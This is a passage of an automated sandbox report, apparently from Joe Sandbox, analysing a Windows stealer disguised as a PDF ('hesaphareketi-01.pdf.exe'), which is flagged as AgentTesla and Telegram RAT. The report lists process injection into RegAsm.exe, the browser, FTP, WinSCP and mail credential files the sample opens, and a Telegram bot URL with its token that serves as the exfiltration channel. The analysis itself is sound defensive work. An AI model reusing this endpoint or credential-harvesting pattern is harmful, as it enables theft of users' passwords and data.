                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599312Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599090Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598765Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598312Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598093Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597765Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597312Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597093Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596967Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596859Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596750Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596639Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596510Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596310Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596078Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595652Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595219Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595094Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594765Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594218Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594109Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594000Jump to behavior
                        Source: RegAsm.exe, 00000003.00000002.3679376567.0000000005AF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341D55C0 RtlAddVectoredExceptionHandler,0_2_00007FF7341D55C0
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF734239808 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF734239808
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Allocates memory in foreign processes
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000Jump to behavior
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000Jump to behavior
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 69E008Jump to behavior
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341D5270 cpuid 0_2_00007FF7341D5270
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341DDD30 GetSystemTimeAsFileTime,0_2_00007FF7341DDD30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.pdf.exe PID: 6992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6596, type: MEMORYSTR
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.pdf.exe PID: 6992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6596, type: MEMORYSTR
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.pdf.exe PID: 6992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6596, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.pdf.exe PID: 6992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6596, type: MEMORYSTR
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.pdf.exe PID: 6992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6596, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		1
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Web Service                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        Access Token Manipulation                        		11
                        Deobfuscate/Decode Files or Information                        		21
                        Input Capture                        		1
                        File and Directory Discovery                        		Remote Desktop Protocol2
                        Data from Local System                        		1
                        Ingress Tool Transfer                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
                        Process Injection                        		12
                        Obfuscated Files or Information                        		1
                        Credentials in Registry                        		36
                        System Information Discovery                        		SMB/Windows Admin Shares1
                        Email Collection                        		11
                        Encrypted Channel                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Software Packing                        		NTDS111
                        Security Software Discovery                        		Distributed Component Object Model21
                        Input Capture                        		3
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets1
                        Process Discovery                        		SSH1
                        Clipboard Data                        		14
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading                        		Cached Domain Credentials141
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                        Virtualization/Sandbox Evasion                        		DCSync1
                        Application Window Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Access Token Manipulation                        		Proc Filesystem1
                        System Network Configuration Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                        Process Injection                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        hesaphareketi-01.pdf.exe34%ReversingLabsWin64.Trojan.GenSteal
                        hesaphareketi-01.pdf.exe39%VirustotalBrowse

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        https://api.ipify.org/0%URL Reputationsafe
                        https://api.ipify.org0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid0%URL Reputationsafe
                        https://account.dyn.com/0%URL Reputationsafe
                        https://aka.ms/dotnet-warnings/0%URL Reputationsafe
                        https://api.telegram0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY0%Avira URL Cloudsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidX0%Avira URL Cloudsafe
                        https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument0%Avira URL Cloudsafe
                        https://api.telegram.org0%Avira URL Cloudsafe
                        https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/0%Avira URL Cloudsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameX0%Avira URL Cloudsafe
                        https://api.telegram.orgx0%Avira URL Cloudsafe
                        http://api.telegram.org0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api.ipify.org
                        		104.26.13.205
                        		truefalse
                          		unknown
                          api.telegram.org
                          		149.154.167.220
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/false
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocumenttrue
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidXhesaphareketi-01.pdf.exe, 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/hesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002851000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.ipify.orghesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidYhesaphareketi-01.pdf.exefalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidhesaphareketi-01.pdf.exefalse
                            • URL Reputation: safe
                            		unknown
                            https://account.dyn.com/hesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://aka.ms/dotnet-warnings/hesaphareketi-01.pdf.exefalse
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.orgRegAsm.exe, 00000003.00000002.3677180762.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002981000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.orgxRegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegramRegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            		unknown
                            http://api.telegram.orgRegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehesaphareketi-01.pdf.exefalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameXhesaphareketi-01.pdf.exe, 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            149.154.167.220
                            		api.telegram.orgUnited Kingdom
                            		62041TELEGRAMRUtrue
                            104.26.13.205
                            		api.ipify.orgUnited States
                            		13335CLOUDFLARENETUSfalse

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1446992
                            Start date and time:2024-05-24 07:40:31 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 8m 19s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:19
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:hesaphareketi-01.pdf.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.expl.evad.winEXE@4/0@2/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 69%
                            • Number of executed functions: 96
                            • Number of non-executed functions: 53
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                            Warnings

